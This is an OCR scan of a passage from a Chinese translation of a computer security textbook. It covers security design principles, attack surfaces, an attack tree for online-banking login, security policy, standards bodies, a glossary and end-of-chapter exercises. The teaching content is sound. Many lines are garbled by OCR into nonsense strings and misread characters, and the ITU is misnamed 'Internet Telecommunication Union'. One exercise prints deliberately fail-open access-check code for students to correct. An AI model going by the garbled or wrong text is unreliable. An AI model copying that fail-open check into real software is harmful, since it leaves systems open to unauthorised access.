护 的 资源 。 更 一 般 的 情况 ， 任 何 一 个 访问 控制 系统 都 应 该 允许 每 一 个 用 户 仅 具有 其 被 授予 的 特 
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权 。 最 小 权限 原则 具有 暂时 性 。 例如 ， 具有 特殊 权限 的 系统 程序 或 管理 员 应 当 仅 在 必要 时 使 用 
这 些 特权 ; 当 进 行 常规 的 活动 时 ， 这 些 特权 应 当 被 收回 。 如 果 没 有 妥善 地 处 理 这 个 问题 就 容易 
引发 意外 事件 的 发 生 。 

最 小 共用 机 制 原则 ， 指 在 设计 时 应 当 最 小 化 不 同 用 户 共 享 的 功能 ， 以 提高 彼此 的 安全 性 。 
这 一 原则 有 助 于 减少 非 预 期 的 通信 路 径 的 数量 , 减少 所 有 用 户 共 同 依赖 的 硬件 和 软件 数量 ， 因 
此 更 易 发 现 是 否 存 在 安全 隐患 。 

心理 可 接受 性 原则 ， 指 安全 机 制 不 应 该 过 度 干 涉 用 户 的 工作 ， 同 时 也 要 满足 用 户 授权 访问 
的 要 求 。 如 果 安 全 机 制 阻碍 了 资源 的 可 用 性 或 可 访问 性 ， 用 户 就 可 能 选择 关闭 这 些 机 制 。 安 全 
机 制 应 当 尽 可 能 地 对 系统 的 用 户 透明 ， 或 者 最 小 化 给 用 户 带 来 的 不 便 。 除 了 不 妨碍 用 户 或 者 引 
起 过 多 的 负担 外 ， 安 全 实施 过 程 还 必须 反映 用 户 理想 的 保护 模式 。 如 果 保 护 实 施 过 程 对 用 户 来 
说 无 意义 ,或 者 用 户 必须 将 其 保护 的 愿望 强行 转变 为 许多 各 种 不 同 的 协议 ,那么 用 户 很 可 能 会 
犯错 误 。 

隔离 原则 ， 这 一 原则 应 用 于 三 种 环境 。 第 一 ， 公 共 访 问 系统 应 当 与 重要 的 资源 (数据 、 进 
EF) 分 离 ， En 在 信息 的 敏感 性 或 重要 性 很 高 时 ， 组 织 要 限制 系统 存储 的 
相关 数据 的 数量 ， 并 在 物理 上 或 逻辑 上 对 其 进行 隔离 。 物 理 隅 离 应 当 确保 一 个 组 织 中 的 公共 访 
问 信息 资源 与 重要 信息 之 间 没 有 物理 上 的 连接 。 人 逻辑 隔离 的 要 求 是 ,在 公共 系统 和 负责 保障 重 
要 信息 安全 性 的 安全 系统 之 间 应 当 建 立 层次 化 的 安全 服务 与 安全 机 制 。 第 二 ,个 人 用 户 的 进程 
和 文件 应 当 与 他 人 的 相隔 离 ， 除 非 明 确 要 求 不 进行 隔离 。 所 有 的 现代 操作 系统 都 提供 了 这 种 隔 
离 的 设备 ， 以 保证 个 人 用 户 有 分 离 的 、 隔 离 的 进程 空间 、 存 储 空 间 和 文件 空间 ， 通 过 阻止 非 授 
权 的 访问 来 实现 对 系统 的 安全 保护 。 最 后 ， 从 阻止 对 安全 机 制 访问 的 意义 上 说 ， 安 全 机 制 也 应 
当 被 隔离 。 例 如 ， 逻 辑 访问 控制 可 能 提供 了 一 个 与 主机 系统 其 他 部 分 相隔 离 的 加 密 软 件 ， 用 以 
保护 加 密 软 件 不 被 自 改 ， 密 钥 不 被 替代 或 泄露 。 

封装 原则 ， 可 以 将 其 视 为 基于 面向 对 象 功能 的 一 种 特殊 形式 的 隅 离 。 封 痛 提 供 安全 是 通过 
如 下 方式 实现 的 : 封装 一 系列 过 程 及 其 域 中 的 数据 对 象 ， 以 使 数据 对 象 的 内 部 结构 仅 能 被 受 保 
护 的 子 系统 中 的 过 程 访问 ， 并 且 这 些 过 程 也 只 能 通过 特定 的 域 的 入 口 点 被 调用 。 

模块 化 原则 ， 在 安全 的 背景 下 是 指 将 各 个 安全 功能 开发 成 分 离 的 、 受 保护 的 模块 ， 也 指使 
用 模块 化 架构 进行 安全 机 制 的 设计 和 实现 。 关 于 使 用 分 离 的 安全 模块 ， 设 计 目 标 就 是 提供 公共 
的 安全 功能 和 服务 ， 比 如 加 密 功 能 ， 作 为 公共 模块 。 例 如 ， 大 量 的 协议 和 应 用 程序 都 使 用 加 密 
功能 。 但 并 不 是 在 每 个 协议 或 应 用 程序 中 都 需要 实现 这 一 功能 ， 而 一 个 更 加 安全 的 设计 是 通过 
开发 一 个 能 够 被 大 量 协议 和 应 用 程序 调用 的 公共 的 加 密 模 块 来 实现 的 。 这 样 ， 设 计 和 实现 工作 
就 集中 到 安全 的 这 一 公共 加 密 模块 的 设计 与 实现 上 了 ， 包 括 模块 免 遭 算 改 的 保护 机 制 。 关 于 模 
块 化 架构 的 使 用 ， 每 个 安全 机 制 都 应 支持 向 新 技术 的 移植 或 者 无 须 重 新 设计 整个 系统 升级 新 的 
特征 。 安 全 设计 应 当 模 块 化 ， 以 使 安全 设计 的 某 些 单个 部 分 可 以 进行 升级 ， 而 无 须 对 整个 系统 
进行 修改 。 

分 层 原 则 ， 指 的 是 使 用 多 重 的 、 重 合 的 保护 办 法 ， 它 强调 的 是 信息 系统 的 人 员 、 技 术 
和 操作 方面 。 通 过 使 用 多 重 的 、 重 全 的 保护 方法 ,任何 单一 的 保护 方法 失效 或 被 规避 都 不 
会 将 系统 置 于 不 受 保护 的 状况 。 在 阅读 全 书 时 我 们 会 发 现 ， 分 层 方法 通常 是 用 来 在 敌手 
与 受 保护 的 信息 或 服务 之 间 提 供 多 重 障 碍 的 。 这 一 技术 通常 也 被 称 为 深度 防御 (defense in 
depth ) - 

最 小 惊动 原则 ， 指 程序 或 用 户 界 面 的 响应 方式 应 当 尽 量 不 出 乎 用 户 的 意料 ， 不 至 于 惊吓 到 
用 户 。 例 如 ， 认 证 机 制 对 用 户 来 讲 应 当 足 够 透明 ， 用 户 能 够 直接 明白 安全 目标 与 所 提供 的 安全 
机 制 之 间 是 如 何 对 应 的 。 
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15 攻击 面 和 攻击 树 


在 1.2 节 中 ,给 出 了 关于 计算 机 和 网 络 系统 的 安全 威胁 和 攻击 的 概述 。 本 书 8.1 节 将 更 加 
详细 地 介绍 攻击 的 本 质 和 带 来 安全 威胁 的 敌手 的 类 型 。 本 节 中 ， 我 们 将 详细 介绍 对 评估 和 分 类 
威胁 非常 有 用 的 两 个 概念 : 攻击 面 和 攻击 树 。 


1.5.1 攻击 面 


攻击 面 是 由 系统 中 可 到 达 的 和 可 被 利用 的 脆弱 点 构成 的 [BELL16, MANA11, HOWA03]。 
以 下 是 攻击 面 的 例子 : 
© 对 外 开放 的 Web 和 其 他 服务 器 的 端口 ， 以 及 监听 这 些 端 口 的 代码 ; 
© 在 防火 墙 内 可 用 的 服务 ; 
o 处 理 进 入 内 部 的 数据 、 电 子 邮 件 、XML 、 办 公文 档 和 工业 级 定制 数据 交换 格式 的 代码 ; 
e 接口 、SQL 和 Web 表单 ; 
o 对 敏感 信息 有 访问 权限 的 员工 ， 这 些 敏感 数据 可 能 会 受到 社会 工程 学 的 攻击 。 
攻击 面 可 以 按 如 下 方式 分 类 : 
e 网 络 攻 击 面 : 网 络 攻击 面 是 指 企 业 网 、 广 域 网 或 者 因特网 中 的 脆弱 点 ， 包 括 网 络 协议 
中 的 脆弱 点 ， 例 如 利用 这 些 脆弱 点 进行 拒绝 服务 攻击 、 通 信 线 路 破坏 和 各 种 不 同形 式 
的 人 侵 攻 击 。 
e 软件 攻击 面 : 软件 攻击 面 是 指 应 用 程序 、 实 用 程序 或 操作 系统 代码 中 的 漏洞 ， 尤 其 是 
指 Web 服务 需 软 件 中 的 漏洞 。 
e 人 为 攻击 面 : 人 为 攻击 面 是 指 员工 或 者 外 
部 人 员 (如 社会 工程 学 、 人 为 错误 和 受信 任 
的 内 部 人 员 ) 引起 的 脆弱 点 。 
攻击 面 分 析 是 评估 系统 威胁 的 规模 和 严重 性 
的 有 用 技术 。 对 这 些 脆 弱点 进行 系统 的 分 析 可 使 
开发 者 和 安全 分 析 师 知道 哪些 安全 机 制 是 必需 
的 。 一 且 定 义 了 攻击 面 ， 设 计 人 员 就 可 能 找到 减 
小 攻击 面 的 方法 ， 从 而 使 敌手 的 入 侵 更 加 困难 。 
攻击 面 也 可 以 为 设置 测试 优先 级 、 增 加 安全 性 方 
法 、 修 改 服务 或 应 用 程序 等 提供 指导 。 
图 1-4 显示 了 使 用 分 层 或 深度 防御 和 减少 攻击 ai Sakis 1 
面 在 降低 安全 风险 中 的 相互 关系 。 攻击 面 


1.5.2 WH 图 1-4 深度 防御 和 攻击 面 


攻击 树 是 一 个 分 支 型 的 、 层 次 化 的 数据 结构 ， 表 示 了 一 系列 潜在 技术 ， 这 些 技术 可 利用 
安全 漏洞 [MAUW05, MOOR01, SCHN99] 进行 攻击 。 作 为 攻击 目标 的 安全 事件 是 这 棵 树 的 根 
节点 ， 攻 击 者 可 以 迭代 地 、 递 增 地 达到 目标 的 途径 就 是 这 棵 树 的 分 支 和 子 节点 。 每 一 个 子 节点 
都 定义 了 一 个 子 目 标 ， 每 一 个 子 目标 都 可 能 有 一 系列 的 进一步 的 子 目 标 ， 等 等 。 从 根 节 点 沿 着 
路 径 回 外 延伸 的 最 终 的 节点 ， 也 就 是 叶子 节点 ， 代 表 了 发 起 一 个 攻击 的 不 同方 式 。 除 了 叶子 节 
点 外 的 每 一 个 节点 ,或 者 是 与 节点 (AND-node)， 或 者 是 或 节点 ( OR-node)。 若 想 达 成 与 节点 
表示 的 目标 ， 则 该 节点 的 所 有 子 节 点 所 代表 的 子 目标 都 要 求 被 实现 ; 若 想 达成 或 节点 表示 的 目 
标 ， 则 只 需要 完成 其 中 至 少 一 个 子 目 标 。 分 支 可 以 用 代表 难度 、 代 价 或 其 他 攻击 属性 的 值 标 
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注 ， 以 便 与 可 选择 的 攻击 进行 比较 。 
使 用 攻击 树 的 动机 是 有 效 地 利用 存在 于 攻击 模式 中 的 有 效 信 息 。 诸 如 CERT (计算 机 应 
急 响应 小 组 ) 等 组 织 发 布 了 安全 建议 ， 这 些 安全 建议 能 够 促进 关于 一 般 攻 击 策略 和 特定 攻击 
模式 的 知识 体 的 发 展 。 安 全 分 析 师 利用 攻击 树 可 以 形成 结构 化 形式 的 安全 攻击 文档 ， 用 以 揭 
示 主 要 的 安全 漏洞 。 攻 击 树 对 系统 和 应 用 程序 的 设计 以 及 对 对 策 的 选取 和 强化 都 具有 指导 
作用 。 
图 1-5 (基于 [DIMI07] 中 的 一 幅 图 ) 是 一 个 网 银 认证 应 用 的 攻击 树 分 析 例 子 。 根 节点 是 攻 
击 者 的 目标 ， 即 破解 用 户 账户 。 树 中 具有 阴影 的 方 框 部 分 为 叶子 节点 ， 代 表 了 构成 攻击 的 事 
件 。 树 中 的 白 框 部 分 通常 是 由 一 个 或 多 个 特定 的 攻击 事件 (叶子 节点 ) 组 成 的 。 注 意 在 这 棵 树 
中 ,除了 叶子 节点 外 的 所 有 节点 都 是 或 节点 (OR-node)。 生 成 这 棵 树 进 行 分 析 时 ， 要 考虑 与 认 
证 相关 的 如 下 三 部 分 : 
e 用 户 终端 和 用 户 (User Terminal and User，UT/U): 这 种 攻击 把 用 户 设备 作为 攻击 目标 ， 
包括 可 能 涉及 的 令 牌 ， 例 如 智能 卡 或 其 他 口令 生成 器 ， 也 可 能 是 用 户 的 各 种 操作 。 
e 通信 信道 (Communication Channel, CC): 此 类 攻击 主要 集中 在 通信 线路 上 。 
e 网 银 服务 器 (Internet Banking Server, IBS): 此 类 攻击 主要 针对 网 银 应 用 所 在 的 服务 需 
进行 离线 攻击 。 
共有 五 类 攻击 可 以 被 识别 ， 每 类 攻击 都 利用 了 以 上 三 个 部 分 中 的 一 个 或 多 个 。 以 下 是 这 
LR: 
e RAAHE (user credential compromise): 这 种 策略 通常 是 针对 攻击 面 中 的 许多 
元 素 的 。 有 实施 程序 上 的 攻击 ， 例 如 监视 用 户 的 行为 以 获取 个 人 标识 码 (PIN ) 或 
其 他 凭证 ， 或 者 盗 取 用 户 的 令 牌 或 手写 记录 。 敌 手 可 能 会 通过 使 用 多 种 令 牌 客 
取 工 具 来 获取 令 牌 信息 ， 例 如 破解 智能 卡 或 蛮 力 破解 PIN。 另 一 种 可 能 的 策略 是 
敬 入 恶意 软件 以 获取 用 户 的 登录 名 及 密码 。 敌 手 可 能 会 通过 通信 信道 ( 串 探 ) 来 
获取 凭证 信息 。 最 后 ,敌手 还 可 能 通过 多 种 手段 与 目标 用 户 进 行 通信 ， 如 图 1-5 
所 示 。 
e 命令 注入 (injection of command): 在 此 类 攻击 中 ， 入 侵 者 能 够 截取 UT 与 IBS 之 
间 的 通信 信息 。 许 多 方法 都 能 用 来 冒充 合法 的 用 户 ， 从 而 获取 银行 系统 的 访问 
权限 。 
e 猜测 用 户 任 证 user credential guessing): [HILT06] 中 记载 ， 通 过 发 送 随 机 用 户 名 和 密 
码 的 方法 蛮 力 攻击 银行 认证 方案 是 可 行 的 。 这 种 攻击 机 制 是 基于 分 布 式 的 僵尸 网 络 ， 
迫使 主机 忙于 自动 运行 基于 用 户 名 或 基于 密码 的 运算 。 
e 违反 安全 策略 (security policy violation): 例如 ， 在 一 个 弱 访 问 控制 和 日 志 机 制 下 违反 
银行 的 安全 策略 ， 员 工 可 能 会 引起 内 部 安全 事件 ， 容 露 客 户 的 账户 信息 。 
e 利用 已 知 的 认证 会 话 (use of known authenticated session): 此 类 攻击 会 说 服用 户 或 强制 
用 户 通过 预先 设置 的 会 话 ID 连接 IBS。 一 旦 用 户 通过 了 服务 器 的 认证 ， 攻 击 者 就 可 以 
利用 已 知 的 会 话 ID 向 IBS 发 送 数据 包 ， 冒 充 用 户 的 身份 信息 。 
图 1-5 给 出 了 有 关 网 银 认 证 应 用 中 不 同类 型 攻击 的 概览 。 从 这 棵 攻击 树 出 发 ， 安 全 分 析 
师 可 以 评估 每 个 攻击 的 风险 ， 并 使 用 上 一 节 (1.4 节 ) 中 列 出 的 设计 原则 设计 全 面 的 安全 设施 。 
[DIMO07] 提供 了 基于 这 种 思想 的 设计 成 果 。 
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获取 银行 账户 
获取 用 户 凭证 UT/U1a 监 视 用 户 
手写 记录 


安装 恶意 软件 漏洞 利用 


UVU2a 隐 藏 的 代码 | 












UT/U3a 智 能 卡 分 析 带 





UTUA REEE 
机 械 手 





UT/U2c 带 有 恶意 代码 
的 电子 邮件 








用 户 与 攻击 者 
Tees 
UT/U4b Web 网 页 混淆 、 

=a 用 通信 重 定向 





Baie 





CG 主动 的 中 间 人 攻击 其 诈 网 站 





攻击 者 利用 已 知 的 用 特定 的 会 话 ID 进 行 CC4 预 定义 的 会 话 
认证 会 话 正常 的 用 户 认证 ID (会 话 动 持 ) 


图 1-5 ”网银 认 证 的 攻击 树 


16 计算 机 安全 策略 


下 面 简要 归纳 一 下 为 提供 计算 机 安全 采用 的 策略 ， 以 总 结 本 章 的 内 容 。[LAMP04] 提出 的 
全 方位 的 安全 策略 涉及 以 下 三 个 方面 : 

o 规范 / 策略 (specification/policy): 安全 方案 应 该 实现 什么 ? 

e 实施 / 机制 (implementation/mechanism): 安全 策略 是 如 何 实现 的 ? 

e 正确 性 /保证 (correctness/assurance): 安全 策略 是 否 确实 起 作用 了 ? 


1.6.1 安全 策略 


设计 安全 服务 和 安全 机 制 的 第 一 步 是 开发 安全 策略 。 在 计算 机 安全 领域 人 们 以 各 种 不 同 的 
方式 使 用 安全 策略 ( security policy) 这 个 术语 。 至 少 ， 安 全 策略 是 系统 期 望 行为 的 非 形式 化 摘 
述 [NRC91]。 这 种 非 形 式 化 策略 应 参考 安全 性 、 完 整 性 和 可 用 性 的 要 求 。 更 普遍 的 情况 是 ， 安 
全 策略 是 规定 或 控制 系统 及 组 织 如 何 提 供 安全 服务 来 保护 敏感 和 关键 的 系统 资源 的 规则 与 实践 
的 形式 化 陈述 ( RFC 4949 )。 这 种 形式 化 安全 策略 有 助 于 通过 系统 的 技术 控制 措施 及 管理 和 运 
行 控 制 措施 来 予以 实施 。 

在 开发 系统 策略 时 ， 安 全 管理 者 需要 考虑 如 下 几 个 因素 : 

e 需要 保护 的 资产 的 价值 ; 

© 系统 的 脆弱 性 ; 

o 潜在 的 威胁 和 可 能 的 攻击 ; 
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进一步 讲 ， 管 理 者 必须 对 下 列 问题 进行 权衡 : 

e 易 用 性 与 安全 ( ease of use versus security): 事实 上 ， 所 有 安全 措施 都 会 对 易 用 性 产生 
影响 。 正 如 下 面 几 个 例子 所 描述 的 那样 : 访问 控制 机 制 要 求 用 户 记 住 口令 ， 此 外 可 能 
还 要 执行 其 他 的 访问 控制 操作 ; 防火 墙 及 其 他 网 络 安 全 措施 可 能 会 降低 可 用 的 传输 容 
量 , 减 慢 响应 时 间 ; 病毒 检测 软件 会 降低 可 用 的 处 理 能 力 ， 并 可 能 由 于 安全 软件 和 操 
作 系 统 之 间 的 不 正确 交互 而 导致 系统 崩 江 或 故障 。 

e 安全 成 本 与 失效 - 恢复 成 本 (cost of security versus cost of failure and recovery): KR SH 
用 性 和 性 能 成 本 外 ， 实 施 和 维护 安全 措施 是 直接 的 经 济 成 本 。 所 有 这 些 成 本 必须 与 缺 
乏 某 种 安全 措施 所 导致 的 安全 失效 和 恢复 的 成 本 平衡 。 对 于 安全 失效 和 恢复 成 本 ,不 
仅 要 考虑 被 保护 资产 的 价值 和 安全 违规 导致 的 损害 ,还 要 考虑 风险 ， 风 险 是 具有 茶 个 
有 害 结果 的 某 个 脆弱 性 有 被 某 个 威胁 利用 的 可 能 。 

因此 ， 安 全 策略 是 可 能 会 受到 法 律 规定 影响 的 商业 决策 。 

1.6.2 ”安全 实施 

安全 实施 涉及 四 个 互 为 补充 的 行动 步骤 : 

e 预防 (prevention): 理想 的 安全 方案 是 ， 在 这 种 方案 下 没有 攻击 能 够 成 功 。 尽 管 这 并 不 
是 对 所 有 情况 都 可 行 ， 但 对 于 众多 威胁 ， 预 防 都 是 一 个 合理 的 目标 。 例 如 ， 考 虑 传输 
加 密 数 据 。 如 果 使 用 安全 的 加 密 算 法 ， 而 且 采 取 适 当 措 施 防 止 对 加 密 密 钥 的 非 授 权 访 
问 ， 那 么 就 能 预防 对 传输 数据 机 密 性 的 攻击 。 

e 检测 (detection): 在 多 数 情况 下 ， 绝 对 的 保护 是 不 可 行 的 ， 但 是 检测 攻击 是 可 以 
的 。 例 如 ， 设 计 人 侵 检测 系统 来 检测 是 否 有 非 授 权 用 户 登 录 系 统 。 另 一 个 例子 是 检 
测 拒绝 服 务 攻击 ， 拒 绝 服务 攻击 使 得 通信 或 处 理 需 资源 被 消耗 以 至 于 合法 用 户 不 能 
使 用 。 

e 响应 (response): 如 果 安 全 机 制 检 测 到 一 个 正在 进行 的 攻击 (如 拒绝 服务 攻击 )， 那 么 
系统 能 做 出 啊 应 ， 中 止 攻 击 并 预防 进一步 的 危害 。 

© 恢复 (recovery): 恢复 的 一 个 实例 是 系统 备份 的 使 用 。 如 果 数 据 的 完整 性 被 损坏 ， 可 以 
重新 装载 以 前 正确 的 数据 备份 。 


1.6.3 ”保证 和 评估 


计算 机 安全 服务 和 机 制 的 “用 户 ”( 如 系统 管理 者 、 销 售 者 、 消 费 者 和 终端 用 户 ) 都 希望 安 
全 措施 能 够 按照 预期 的 目标 正常 工作 。 也 就 是 说 ， 安 全 用 户 希望 系统 的 安全 基础 设施 能 够 满足 
安全 要 求 并 执行 安全 策略 。 由 这 些 想法 引入 了 保证 和 评估 的 概念 。 

保证 (assurance) 是 信息 系统 的 一 个 属性 ， 它 为 系统 的 运行 提供 了 可 靠 的 依据 ， 从 而 实现 
了 系统 的 安全 策略 。 这 包括 系统 设计 和 系统 实现 。 因 此 ， 保 证 处 理 的 问题 是 :“ 安 全 系统 的 设 
计 是 否 满足 其 要 求 ?”“ 安 全 系统 的 实现 是 否 符合 其 规范 ?” 保 证 是 用 信任 程度 来 表示 的 ， 而 不 
是 对 设计 或 实施 的 形式 化 证 明 。 就 目前 关于 设计 与 实施 的 情况 看 ， 越 过 信任 程度 而 达到 绝对 证 
明 是 不 可 能 的 。 人 们 在 开发 定义 需求 、 描 述 设计 与 实施 的 形式 化 模型 ， 以 及 运用 逻辑 和 数学 技 
巧 来 处 理 这 些 问 题 方面 已 经 做 了 很 多 工作 。 但 是 ， 保 证 依然 停留 在 信任 程度 层面 。 

评估 (evaluation) 是 依据 某 准则 检查 计算 机 产品 或 系统 的 过 程 。 评 估 包 括 测 试 ， 可 能 还 包 
括 形 式 化 分 析 或 数学 技术 。 该 领域 的 中 心 工 作 是 开发 能 够 应 用 到 任何 安全 系统 (包括 安全 服务 
和 机 制 ) 并 对 产品 比较 提供 广泛 支持 的 评估 准则 。 
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1.7 标准 

ASB HP FRB AY AF ee OR A FE AE. US, EEC RE, PAGE 
管理 实践 、 安 全 机 制 和 服务 的 总 体 架构 。 我 们 利用 正在 使 用 的 最 重要 的 或 正在 开发 的 标准 来 描 
述 计 算 机 安全 的 各 个 方面 。 各 种 组 织 都 在 致力 于 促进 或 推动 这 些 标准 的 发 展 。 一 些 最 重要 ( 截 
止 到 当前 的 版 本 ) 的 组 织 如 下 : 

e 美 家 标准 与 技术 研究 所 (National Institute of Standard and Technology, NIST) : 
NIST 是 美国 联邦 政府 的 一 个 机 构 ， 负 责 制 定 美国 政府 使 用 的 度量 科学 、 标 准 和 技术 ， 
也 负责 推动 美国 私营 企业 的 创新 。 尽 管 是 一 个 美国 国家 机 构 ， 但 NIST 联邦 信息 处 理 
标准 (Federal Information Processing Standards, FIPS) 与 Special Publications (SP) 有 着 
国际 范围 的 影响 力 。 

Internet f= (Internet Society) : ISOC 是 一 个 专业 的 成 员 联 盟 ， 其 拥有 世界 性 的 组 织 
成 员 和 个 人 成 员 。 在 诸如 Internet 的 未 来 等 前 沿 问 题 上 ， 它 处 于 领导 者 的 地 位 。 同 时 ， 
它 也 是 制定 各 种 Internet 基础 设施 标准 组 织 的 管理 机 构 。 这 些 组 织 包括 : Internet 工程 
任务 组 (Internet Engineering Task Force, IETF) 和 Internet 体系 结构 委员 会 ( Internet 
Architecture Board，IAB)。 这 些 组 织 制定 Internet 标准 和 相关 细节 。 所 有 的 标准 都 以 请 
求 评论 (Requests For Comments, RFC) 的 形式 公布 。 
ITU 电信 标准 化 部 门 (ITU-T): Internet 电子 通信 联盟 (Internet Telecommunication 
Union, ITU) 是 联合 国 系 统 中 的 一 个 国际 性 组 织 ， 各 国政 府 和 私营 企业 在 它 的 领导 下 
一 起 协调 全 球 的 电子 通信 了 网络 和 服务 。ITU 电信 标准 化 部 门 (ITU Telecommunication 
Standardization Sector, ITU-T) Æ ITU 的 三 大 部 门 之 一 。ITU-T 的 任务 是 制定 覆盖 所 有 
电子 通信 和 领域 的 标准 。ITU-T 的 标准 被 称 为 推荐 标准 (Recommendation ) 。 
o 国际 标准 化 组 织 : 国际 标准 化 组 织 (ISO) 9 是 一 个 由 全 球 140 多 个 国家 的 国家 标准 组 
织 参加 的 世界 联盟 。ISO 是 一 个 非 政 府 组 织 ， 它 负责 推动 标准 化 的 发 展 ， 促 进 国际 商 
品 和 服务 交换 ， 发 展 全 球 在 智力 、 科 学 、 技 术 和 经 济 活动 方面 的 合作 。ISO 的 工作 促 
使 国际 协议 变 成 国际 标准 。 
附录 C 对 这 些 组 织 进行 了 更 详细 的 讨论 。 本 书 未 尾 提供 了 本 书 引 用 的 ISO Al NIST 文档 列表 。 


1.8 关键 术语 、 复 习题 和 习题 


关键 术语 

access control (访问 控制 ) authenticity (真实 性 ) 

active attack (主动 攻击 ) availability (可 用 性 ) 

adversary (fit) complete mediation (绝对 中 介 ) 
asset (资产 ) confidentiality (机 密 性 ) 
assurance (保证 ) corruption (损坏 ) 

attack (攻击 ) countermeasure (对 策 ) 

attack surface (攻击 面 ) data confidentiality (数据 机 密 性 ) 
attack tree (攻击 树 ) data integrity (数据 完整 性 ) 
authentication (认证 ) denial of service (拒绝 服务 ) 


O ISO 不 是 缩 略 词 (假如 是 缩 略 词 就 应 该 写 为 IOS)， 而 是 一 个 单独 的 词汇 ， 它 来 自 希 腊 语 ， 有 平等 (equal) 之 


意 。 





译 者 注 


disruption (破坏 ) 

economy of mechanism (经 济 机 制 | ) 
encapsulation (封装 ) 

encryption (加 密 ) 

evaluation (评估 ) 

exposure (暴露 ) 

fail-safe defaults (安全 缺 省 设置 ) 
falsification (伪造 ) 
incapacitation (K fié ) 

inference (推理 ) 

inside attack (内 部 攻击 ) 
integrity (完整 性 ) 

interceptions (截获 ) 

interception (人 侵 ) 

isolation (隔离 ) 

layering (分 层 ) 

least astonishment (最 小 惊动 ) 


least common mechanism (最 小 共用 机 制 ) 


least privilege (最 小 特权 ) 
masquerade (冒充 ) 
misappropriation (盗用 ) 
misuse (RHH) 

modularity (模块 化 ) 
nonrepudiation ( 抗 抵赖 ) 


复习 题 
1.1 给 出 计算 机 安全 的 定义 。 
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obstruction (阻碍 ) 

open design (开放 式 设计 ) 

OSI security architecture (OSI 安全 体系 结构 ) 
outside attack( 外 部 攻击 ) 

passive attack (被 动 攻击 ) 

prevent (阻止 ) 

privacy (隐私 ) 

psychological acceptability (心理 可 接受 性 ) 
replay ( 重 放 ) 

repudiation (抵赖 ) 

risk (风险 ) 

security attack (安全 攻击 ) 

security mechanism (安全 机 制 ) 
security policy (安全 策略 ) 

security service (安全 服务 ) 
separation of privilege (权限 分 离 ) 
system integrity (系统 完整 性 ) 
system resource (系统 资源 ) 

threat agent (威胁 代理 ) 

traffic analysis (流量 分 析 ) 
unauthorized disclosure( 非 授权 泄露 ) 
usurpation( 算 夺 ) 

vulnerability (MESSE, daniel ) 


1.2 被动 安全 威胁 和 主动 安全 威胁 的 区 别 是 什么 ? 

1.3 列举 并 简要 定义 被 动 和 主动 网 络 安全 攻击 的 分 类 。 
1.4 列举 并 简要 定义 基本 安全 设计 原则 。 

1.5 解释 攻击 面 和 攻击 树 之 间 的 不 同 。 


习题 


1.1 思考 在 自动 柜员 机 (ATM) 上 用 户 提 供 银行 卡 和 个 人 标识 码 (PIN) 用 于 账户 访问 的 场景 。 给 出 与 系 
统 相 关 的 机 密 性 、 完 整 性 和 可 用 性 要 求 的 例子 ， 并 说 明 每 种 情况 下 要 求 的 重要 性 等 级 。 

1.2 ”电话 交换 系统 根据 呼叫 者 请 求 的 电话 号 码 在 交换 网 络 中 路 由 呼叫 。 针 对 这 种 情况 考虑 习题 1.1 给 出 
的 问题 。 

1.3 考虑 一 个 由 许多 机 构 使 用 的 打印 文档 的 桌面 印刷 系统 。 
a. 给 出 存储 数据 的 机 密 性 为 最 高 需求 的 出 版 物 类 型 的 例子 。 
b. 给 出 存储 数据 的 完整 性 为 最 高 需求 的 出 版 物 类 型 的 例子 。 
c. 给 出 系统 可 用 性 为 最 高 需求 的 例子 。 

1.4 对 于 下 列 每 种 资产 ， 分 别 为 机 密 性 、 可 用 性 和 完整 性 缺失 分 配 低 、 中 或 高 影响 级 别 ， 并 说 明理 由 。 
a. 一 个 组 织 管理 Web 服务 器 上 的 公开 信息 。 
b. 执法 机 构 管理 极其 敏感 的 调查 信息 。 
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c. 金融 组 织 管理 日 常 行政 信息 (不 是 与 隐私 有 关 的 信息 )。 

d. 一 家 承包 机 构 用 于 大 量 采 集 数 据 的 信息 系统 既 包 含 敏感 的 、 预 询 价 ( pre-solicitation) 阶段 的 合同 
信息 ， 也 包含 日 常 管理 信息 。 分 别 对 两 个 数据 集 和 整个 信息 系统 的 影响 进行 评价 。 

e. 一 家 电厂 使 用 SCADA (监控 与 数据 采集 ) 系统 控制 大 型 军事 基地 的 电力 分 配 。SCADA 系统 既 包 
含 实时 传 感 数据 ， 也 包含 日 常 管理 信息 。 分 别 对 两 个 数据 集 和 整个 信息 系统 的 影响 进行 评价 。 

考虑 如 下 人 允许 访问 资源 的 代码 : 


DWORD dwRet = IsAccessAllowed(...); 
if (dwRet == ERROR_ACCESS_DENIED) { 
// Security check failed. 

// Inform user that access is denied. 
} else { 

// Security check OK. 

} 


a. 解释 程序 中 存在 的 安全 缺陷 。 

b. 重 写 代 码 以 避免 缺陷 。 

提示 ; 考虑 安全 和 缺 省 设置 原则 。 

设计 攻击 树 ， 目 标 是 获取 物理 安全 中 相关 内 容 的 访问 权限 。 

假设 一 个 公司 在 安装 在 两 个 建筑 内 的 同一 资产 上 运营 ， 一 个 建筑 是 总 部 ， 而 另 一 个 建筑 包含 了 网 络 
和 计算 机 服务 。 物 理 安全 方面 ， 用 坚固 的 围栏 在 四 周 对 资产 进行 保护 。 除 此 之 外 ， 物 理 安全 还 包括 
了 前 门 的 警卫 。 局 域 网 分 为 总 部 局 域 网 和 网 络 服务 局 域 网 。 网 络 使 用 者 通过 防火 墙 连接 Web 服务 
器 。 拨 号 用 户 通 过 拨号 可 以 连接 网 络 服务 局 域 网 。 请 设计 一 个 攻击 树 ， 它 的 根 节 点 表示 资产 机 密 的 
泄露 ， 包 括 物 理 上 的 、 社 会 工程 学 和 技术 攻击 。 这 个 攻击 树 可 以 包括 与 节点 (AND-node) 和 或 节点 
(OR-node)。 请 设计 一 个 至 少 包含 15 个 叶子 节点 的 树 。 

请 阅读 http://williamstallings.com/ComputerSecurity/ 中 建议 阅读 的 文档 内 的 所 有 经 典 论文 。 写 一 篇 
500~ 1000 字 的 文章 (或 包含 8 一 12 个 幻灯 片 的 PPT)， 总 结 这 些 经 典 论文 中 的 关键 概念 ， 尤 其 是 在 
大 多 数 或 全 部 论文 中 出 现 的 概念 。 


| 第 一 部 分 


Computer Security: Principles and Practice, 4th Edition 


计算 机 安全 技术 与 原理 
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第 2 章 | 


Computer Security: Principles and Practice, 4th Edition 


密码 编码 工具 





学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 解释 对 称 分 组 加 密 算法 的 基本 操作 ; 
© 比较 和 区 分 分 组 加 密 和 流 密码 ; 


讨论 安全 散 列 函数 在 消息 认证 中 的 应 用 ; 

列举 安全 散 列 函数 的 其 他 应 用 场景 ; 

